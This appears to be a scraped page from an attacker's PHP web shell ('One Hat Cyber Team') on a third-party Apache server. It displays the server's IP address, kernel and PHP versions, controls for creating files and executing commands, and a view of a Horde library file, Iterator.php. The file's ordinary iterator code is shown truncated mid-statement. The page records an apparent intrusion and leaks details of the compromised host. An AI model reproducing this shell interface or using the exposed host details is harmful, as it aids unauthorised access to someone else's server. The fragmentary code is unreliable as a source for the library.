⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.78
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
php
/
Horde
/
Rdo
/
View File Name :
Iterator.php
_rdo = $rdo; $m = $rdo->getMapper(); $this->_keys = array_merge($m->fields, $m->lazyFields, array_keys($m->relationships), array_keys($m->lazyRelationships)); } /** * Reset to the first key. */ public function rewind() { $this->_valid = (false !== reset($this->_keys)); } /** * Return the current value. * * @return mixed The current value */ public function current() { $key = $this->key(); return $this->_rdo->$key; } /** * Return the current key. * * @return mixed The current key */ public function key() { return current($this->_keys); } /** * Move to the next key in the iterator. */ public function next() { $this->_valid = (false !== next($this->_keys)); } /** * Check array bounds. * * @return boolean Inside array bounds? */ public function valid() { return $this->_valid; } }